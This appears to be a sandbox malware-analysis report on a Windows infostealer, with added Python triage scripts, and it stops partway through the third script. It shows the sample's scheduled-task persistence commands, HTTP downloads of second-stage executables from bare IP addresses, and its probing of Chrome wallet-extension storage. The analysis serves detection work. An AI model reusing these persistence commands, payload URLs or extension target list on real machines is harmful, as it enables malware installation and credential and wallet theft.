Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Jan. 17, 2024, 8:05 a.m. | Jan. 17, 2024, 8:21 a.m. |
Process | PID | Command line |
---|---|---|
schtasks.exe | 2448 | schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST |
schtasks.exe | 2560 | schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST |
HMY7P2elTJeLWFuUrZFu.exe | 2724 | "C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\HMY7P2elTJeLWFuUrZFu.exe" |
2hMM9txR1g67fgph3Nnz.exe | 2780 | "C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\2hMM9txR1g67fgph3Nnz.exe" |
iexplore.exe | 2912 | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2832 CREDAT:145409 |
chrome.exe | 2460 | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com |
chrome.exe | 2744 | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef2c86e00,0x7fef2c86e10,0x7fef2c86e20 |
crashreporter.exe | 2620 | "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\1pfa5s83.default-release\minidumps\c497e1ef-bec2-4cab-999c-911c20288065.dmp" |
minidump-analyzer.exe | 1780 | "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\1pfa5s83.default-release\minidumps\c497e1ef-bec2-4cab-999c-911c20288065.dmp" |
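The two schtasks.exe rows are the persistence mechanism: the same binary under C:\ProgramData is registered twice, once hourly and once at logon, with /f so an existing task of that name is overwritten without prompting and /rl HIGHEST so the task asks for the highest token the account has. Note the caveat that /rl HIGHEST only yields an elevated token when /RU names an administrator; for a standard user it changes nothing. On disk the tasks appear as C:\Windows\System32\Tasks\MPGPH131 HR and MPGPH131 LG, and with "Audit Other Object Access Events" enabled the creation is logged as Security event 4698. The script below is an added example, not part of the report: it parses schtasks /create command lines such as the two above and explains why each one looks like persistence. The third command line in the sample input is invented for contrast and is not from the report.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: the two task creations observed in the report,
# plus one invented benign-looking task for contrast (not from the report).
SAMPLE_CMDLINES = [
    'schtasks /create /f /RU "test22" /tr "C:\\ProgramData\\MPGPH131\\MPGPH131.exe" '
    '/tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST',
    'schtasks /create /f /RU "test22" /tr "C:\\ProgramData\\MPGPH131\\MPGPH131.exe" '
    '/tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST',
    'schtasks /create /tn "Nightly Backup" /tr "C:\\Program Files\\Backup\\backup.exe" '
    '/sc DAILY /st 02:00',
]

# Directories a standard user can write to; a task action stored there can be
# replaced by any process running as that user.
USER_WRITABLE = re.compile(r'^[a-z]:\\(programdata|users\\[^\\]+\\appdata)\\', re.I)
# Schedules that re-launch the action without any user interaction.
PERSISTENCE_TRIGGERS = {'ONLOGON', 'ONSTART', 'ONIDLE', 'MINUTE', 'HOURLY'}


@dataclass
class TaskCreate:
    task_name: str
    action: str
    schedule: str
    run_level: str
    run_as: str
    force: bool
    reasons: list = field(default_factory=list)


def tokenize(cmdline):
    """Split a Windows command line, keeping quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_schtasks_create(cmdline):
    """Return a TaskCreate for 'schtasks /create ...', or None for anything else."""
    toks = tokenize(cmdline)
    if len(toks) < 2:
        return None
    exe = toks[0].lower().rsplit('\\', 1)[-1]
    if exe not in ('schtasks', 'schtasks.exe') or toks[1].lower() != '/create':
        return None
    opts = {}
    i = 2
    while i < len(toks):
        if toks[i].startswith('/'):
            key = toks[i][1:].lower()
            # A switch consumes the next token as its value unless that token
            # is itself a switch ("/f /RU ..." makes /f a bare flag).
            if i + 1 < len(toks) and not toks[i + 1].startswith('/'):
                opts[key] = toks[i + 1]
                i += 2
                continue
            opts[key] = True
        i += 1
    return TaskCreate(
        task_name=opts.get('tn', ''),
        action=opts.get('tr', ''),
        schedule=str(opts.get('sc', '')).upper(),
        run_level=str(opts.get('rl', 'LIMITED')).upper(),  # LIMITED is the schtasks default
        run_as=opts.get('ru', ''),
        force=opts.get('f') is True,
    )


def assess(task):
    """Attach the reasons why this task creation looks like persistence."""
    reasons = []
    if task.run_level == 'HIGHEST':
        reasons.append('requests the highest available token (/rl HIGHEST)')
    if task.schedule in PERSISTENCE_TRIGGERS:
        reasons.append(f'auto-relaunch trigger (/sc {task.schedule})')
    if USER_WRITABLE.match(task.action):
        reasons.append('action binary lives in a user-writable directory')
    if task.force:
        reasons.append('/f silently overwrites an existing task of the same name')
    task.reasons = reasons
    return task


def triage(cmdlines):
    """Parse every schtasks /create in the input and return the suspicious ones."""
    findings = []
    for cmd in cmdlines:
        task = parse_schtasks_create(cmd)
        if task is not None and assess(task).reasons:
            findings.append(task)
    return findings


if __name__ == '__main__':
    for t in triage(SAMPLE_CMDLINES):
        print(f'{t.task_name!r} -> {t.action} [{t.schedule}, run as {t.run_as}]')
        for r in t.reasons:
            print('   -', r)
```

Fed with Sysmon event 1 or Security 4688 command lines instead of the embedded sample, the same parser turns the two rows above into two findings with four reasons each, while the invented daily task under Program Files produces none.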
Name | Response | Post-Analysis Lookup |
---|---|---|
fbcdn.net | 157.240.215.35 | |
facebook.com | 157.240.215.35 | |
www.facebook.com | 157.240.215.35 | |
ipinfo.io | 34.117.186.192 | |
static.xx.fbcdn.net | CNAME scontent.xx.fbcdn.net; 157.240.215.14 | |
fbsbx.com | 157.240.215.35 | |
db-ip.com | 104.26.5.15 | |
connect.facebook.net | CNAME scontent.xx.fbcdn.net; 157.240.215.14 | |
IP Address | Status | Action |
---|---|---|
109.107.182.3 | Active | Moloch |
117.18.232.200 | Active | Moloch |
157.240.215.14 | Active | Moloch |
157.240.215.35 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.67.75.166 | Active | Moloch |
185.215.113.68 | Active | Moloch |
193.233.132.62 | Active | Moloch |
34.117.186.192 | Active | Moloch |
23.67.53.17 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49168 172.67.75.166:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5 |
TLSv1 192.168.56.103:49194 157.240.215.14:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49191 157.240.215.14:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49192 157.240.215.14:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49198 157.240.215.35:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49203 157.240.215.35:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net | e1:b5:47:7b:aa:89:cf:ef:84:ea:87:3a:8e:d0:cd:a8:cd:5f:55:8b |
TLSv1 192.168.56.103:49197 157.240.215.14:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49188 157.240.215.35:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49187 157.240.215.35:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49196 157.240.215.14:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49199 157.240.215.35:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49201 157.240.215.35:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net | e1:b5:47:7b:aa:89:cf:ef:84:ea:87:3a:8e:d0:cd:a8:cd:5f:55:8b |
TLSv1 192.168.56.103:49200 157.240.215.35:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net | e1:b5:47:7b:aa:89:cf:ef:84:ea:87:3a:8e:d0:cd:a8:cd:5f:55:8b |
TLSv1 192.168.56.103:49205 157.240.215.14:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49206 157.240.215.14:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49195 157.240.215.14:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49193 157.240.215.14:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=*.facebook.com | 29:12:1f:fa:41:f6:0a:78:9c:f1:97:5a:43:e9:d8:b5:c2:d6:85:f5 |
TLSv1 192.168.56.103:49202 157.240.215.35:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA | C=US, ST=California, L=Menlo Park, O=Meta Platforms, Inc., CN=fbcdn.net | e1:b5:47:7b:aa:89:cf:ef:84:ea:87:3a:8e:d0:cd:a8:cd:5f:55:8b |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH |
registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe |
suspicious_features | Connection to IP address | suspicious_request | HEAD http://185.215.113.68/mine/amer.exe |
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.68/mine/amer.exe |
suspicious_features | Connection to IP address | suspicious_request | HEAD http://109.107.182.3/cost/go.exe |
suspicious_features | Connection to IP address | suspicious_request | GET http://109.107.182.3/cost/go.exe |
request | HEAD http://185.215.113.68/mine/amer.exe |
request | GET http://185.215.113.68/mine/amer.exe |
request | HEAD http://109.107.182.3/cost/go.exe |
request | GET http://109.107.182.3/cost/go.exe |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
request | GET https://db-ip.com/demo/home.php?s=175.208.134.152 |
request | GET https://www.facebook.com/login |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/y1/r/0_HoU29ShlI.js?_nc_x=Ij3Wp8lg5Kz |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/7_6o7HJ05F8.css?_nc_x=Ij3Wp8lg5Kz |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/om552iOCRxJ.css?_nc_x=Ij3Wp8lg5Kz |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/y5/l/0,cross/QoWVNltU_ZO.css?_nc_x=Ij3Wp8lg5Kz |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/ya/l/0,cross/EQ0cyse2DGv.css?_nc_x=Ij3Wp8lg5Kz |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/yr/l/0,cross/wMc7fNlPdnA.css?_nc_x=Ij3Wp8lg5Kz |
request | GET https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg |
request | GET https://facebook.com/security/hsts-pixel.gif?c=3.2.5 |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/xGzxHIbkRpC.js?_nc_x=Ij3Wp8lg5Kz |
request | GET https://fbcdn.net/security/hsts-pixel.gif?c=2.5 |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/yK/r/Lzd-U--zeLf.js?_nc_x=Ij3Wp8lg5Kz |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/O7nelmd9XSI.png |
request | GET https://fbsbx.com/security/hsts-pixel.gif?c=5 |
request | GET https://connect.facebook.net/security/hsts-pixel.gif |
request | GET https://www.facebook.com/favicon.ico |
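Two of the requests above stand out from the browser noise: amer.exe and go.exe are fetched over cleartext HTTP from bare IP addresses, each with a HEAD probe immediately followed by a GET, which is why neither appears in the Suricata TLS table (that table holds only the Facebook and Cloudflare sessions opened by the browsers). The db-ip.com lookup carries the sandbox's own public address as its s= parameter, and ipinfo.io is resolved as well; loaders and stealers commonly query such services to decide whether to run in a given region. The script below is an added example, not part of the report: it parses request rows in the report's own layout, pairs HEAD and GET by URL, flags second-stage downloads and geolocation checks, and emits a flat IOC list. The embedded input is a subset of the rows above.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: a subset of the 'request' rows from the report.
SAMPLE_REQUESTS = """\
request | HEAD http://185.215.113.68/mine/amer.exe |
request | GET http://185.215.113.68/mine/amer.exe |
request | HEAD http://109.107.182.3/cost/go.exe |
request | GET http://109.107.182.3/cost/go.exe |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
request | GET https://db-ip.com/demo/home.php?s=175.208.134.152 |
request | GET https://www.facebook.com/login |
request | GET https://static.xx.fbcdn.net/rsrc.php/v3/y1/r/0_HoU29ShlI.js?_nc_x=Ij3Wp8lg5Kz |
"""
# Names from the DNS table; ipinfo.io was resolved but never appears as a request row.
SAMPLE_DNS_NAMES = ['fbcdn.net', 'facebook.com', 'ipinfo.io', 'db-ip.com']

GEOIP_SERVICES = {'ipinfo.io', 'db-ip.com'}  # public "my IP / my location" services
PAYLOAD_EXTENSIONS = ('.exe', '.dll', '.scr', '.msi', '.bat', '.ps1')
ROW = re.compile(r'^request \| (HEAD|GET|POST) (\S+)')


def parse_requests(text):
    """Return (method, url) for each 'request | METHOD URL |' row."""
    out = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            out.append((m.group(1), m.group(2)))
    return out


def is_bare_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_payload_downloads(requests):
    """Group requests by URL and flag the ones that look like second-stage fetches."""
    methods_by_url = defaultdict(set)
    for method, url in requests:
        methods_by_url[url].add(method)
    hits = []
    for url, methods in methods_by_url.items():
        u = urlsplit(url)
        reasons = []
        if u.hostname and is_bare_ip(u.hostname):
            reasons.append('host is a bare IP (no DNS name, no certificate)')
        if u.scheme == 'http':
            reasons.append('cleartext HTTP')
        if u.path.lower().endswith(PAYLOAD_EXTENSIONS):
            reasons.append('path ends in an executable extension')
        if {'HEAD', 'GET'} <= methods:
            reasons.append('HEAD probe followed by GET (availability/size check, then fetch)')
        # An executable path is enough on its own; otherwise require two weaker signals
        # so that plain-HTTP browser traffic (the IE9 compat list) is not flagged.
        if any('executable' in r for r in reasons) or len(reasons) >= 2:
            hits.append({'url': url, 'host': u.hostname, 'reasons': reasons})
    return hits


def find_geoip_checks(requests, dns_names):
    """Hosts contacted or resolved that belong to IP-geolocation services."""
    hosts = {urlsplit(url).hostname for _, url in requests} | set(dns_names)
    return sorted(h for h in hosts if h in GEOIP_SERVICES)


def to_iocs(hits):
    """De-duplicated hosts and URLs suitable for a blocklist."""
    return {'hosts': sorted({h['host'] for h in hits}),
            'urls': sorted(h['url'] for h in hits)}


if __name__ == '__main__':
    reqs = parse_requests(SAMPLE_REQUESTS)
    hits = find_payload_downloads(reqs)
    for h in hits:
        print(h['url'])
        for r in h['reasons']:
            print('   -', r)
    print('geolocation services:', find_geoip_checks(reqs, SAMPLE_DNS_NAMES))
    print('IOCs:', to_iocs(hits))
```

On the sample the two bare-IP downloads collect all four reasons each, the IE9 compatibility list (cleartext but otherwise ordinary) and the Facebook resources are left alone, and both geolocation services are reported.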
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\bgpipimickeadkjlklgciifhnalhdjhe\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Sync Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT |
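Every Chrome file row above has the same shape: User Data\<folder>\Local Extension Settings or Sync Extension Settings\<32-letter extension id>\CURRENT, where CURRENT is the LevelDB pointer file Chrome keeps for an extension's storage. Only Default is a real profile; ShaderCache, Crashpad, OriginTrials, CertificateRevocation and the rest are component and cache directories that never contain extension storage, so the sample is walking every subdirectory of User Data as if it were a profile and probing for a fixed list of extension IDs. That list is the stealer's target list (it includes nkbihfbeogaeaoehlefnkodbefgpgknn, the Chrome Web Store ID of the MetaMask wallet extension; the other IDs are not resolved here). The script below is an added example, not part of the report: it extracts the IDs and the folders from rows in the report's layout and separates genuine profile folders from the bogus ones, which is the part worth turning into a hunting rule. The embedded input is a subset of the rows above.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the 'file' rows from the report (plus one
# unrelated IE cache row to show it is ignored).
SAMPLE_ROWS = r"""
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT |
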